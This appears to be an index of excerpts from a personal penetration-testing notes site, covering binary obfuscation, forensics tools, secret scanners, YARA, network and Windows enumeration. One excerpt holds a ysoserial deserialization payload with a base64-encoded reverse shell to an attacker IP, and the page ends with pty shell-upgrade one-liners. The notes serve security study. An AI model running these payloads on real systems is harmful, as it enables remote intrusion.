Simple protection A packer can be used to “optimize” / “compress” a binary which on the other hand also makes it harder to debug. A packer removes unesessary information and the minification can lead also to obfuscation to some extend. A standard tool is UPX. Minimize a binary with upx -9 bin.elf. Advanced protection Obfuscation…
This post describes methods to transform/obfuscate/minimize Linux ELF files. sstrip The sections are used for debugging and not neccessary for a program’s execution. The command sstrip removes all sections from the file. sstrip bin.elf After the command, it can be verified with readelf --sections bin.elf that there are not sections are in the file.
Concepts A segment is a piece of a information which is mapped into the memory (of a process). A ELF binary can have zero or multiple segments. It defines also where the OS should put it into the memory. Each segment has a Program Header which describes the sections within. A section is a distinctive…
Overwrite functions with LD_PRELOAD The LD_PRELOAD environment variable allows to inject a library which is loaded before the program libraries. This means that it is possible to redirect the execution flow to an injected function via an own library object.
This page collects tools for the Linux Executable and Linking Format (ELF) with some basic commands. checksec.sh Shows which exploits mitigations a program has. (Source) ./checksec.sh --file file.elf GDB See the gdb post. Objdump Objdump shows information about a binary (object) file. Show the assemble code from a ELF file. objdump -d bin.elf Show all symbols (e.g.…
Mirroring gittyleaks: Execute within a local repository the command gittyleaks --find-anything. git-secrets: Scans (only) commit messages for sensitive information with git secrets --scan-history. truffleHog: Scans repos and prints out information with a high entropy: Execute it with trufflehog $repo_dir. git-secret-scanner: Scans a repo with git-secret-scanner scan -d $git_repo. Other tools
See also MemProcFS The forensic memory framework Volatility (Version 3 since 2019) offers a wide range of methods to analyse memory. See the blog post Retrieving memory for methods and techniques to obtain memory. Start by getting general information about a memory dump: volatility -f image.mem imageinfo Now use the following commands to get more information:…
Yet another ridicolous acrynom is a tool for detect information in binary and text files. YARA rules are writen in text files. By calling yara with a rule file and a file to test, it either returns nothing if no rule was detected or one or multiple rules which matches the provided file. Example: The follwing rule…
Malware (Notes are taken from the TryHackMe course.) John von Neumann (!) created a concept of malicious software in 1949. The first implementation was done in 1971 by Bob Thomas. The program Creeper jumped from one system (running the operating system Tenex) to another and just printed a message on each console. The team Nematode is…
Addresses within the memory are referenced with @ General Starting with directly analysing all referenced code. r2 -A $file ... e emu.str = true Starting with enabled debugger (only when I want to execute the program) r2 -AA -e dbg.follow.child=true -e dbg.forks=true -d $file ... e emu.str = true Fork parameter: If the process forks, the debugger halts Type…
IKE is used on VPN servers on UDP 500. Test a server with ike-scan -M $target Example output: SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080) Ending ike-scan 1.9.4: 1 hosts scanned in 0.039 seconds (25.32 hosts/sec). 1 returned handshake; 0 returned notify PSK means that a preshared key is used. 1 returned handshake, 0, returned notify means that…
What to do if all ports seemed to be closed? Open Wireshark and monitor it during a full TCP scan Scan also all UDP ports Filter in Wireshark where the target connected back to you. Port knocking? Can you trigger the server via a third-party? Or does it change a behviour time-based?
Enumeration See Oracle article
If you can provide a serialized (.ser) file, try to create a payload directly, if you have the source code, or just use a yoserial payload. java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 4 192.168.49.175" > /tmp/recycler.ser // Prepare a reverse shell command line an transform it into b64. java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjE3NS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}"…
File and directory integrity levels C:\Users\User>icacls hallo hallo NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) WINDEV2012EVAL\User:(I)(F) Mandatory Label\High Mandatory Level:(NW) (I)(F) means that the corresponding user or group has (F) Full permission on the file and that the permissions are inherited from the parent = directory. Note that the Read right ® also enables execution on that file! (There…
Should exploit /tmp/18650.py not work, use svwar ‑m INVITE ‑e100-500 10.10.10.7 to determine the proper extension id.
Pentesters love 0days and cool exploits. “There are FAR more misconfigurations than vulns.” “Vulns will be detected and patches by Nessus, Nexpose, etc.” “Misconfigurations typically are missed by scanners.” “You want to increase security? Go to your boss and change the job descriptions of admins to include confidentialty and integrity. That matters more than anything else.” “If you…
Various Show who else is logged in. qwinsta Open the Event Viewer and search in the looks. Have fun! Network enumeration Show the network configuration. Are there multiple interfaces? ipconfig /all Routing information route print Show current network connections. After checking this command: CHECK all ports with the previous found ones! netstat -ano Check the ARP cache…
Determine if the system has the WSL with bash: where /R C:\windows bash.exe If bash.exe is there and the WSL is running, then commands can be run as root (!) like: C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.19041.423_none_1da742a41b53e164\bash.exe whoami Install the WSL To install the WSL, a system shell is required unfortunatelly. See this article for installation.
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';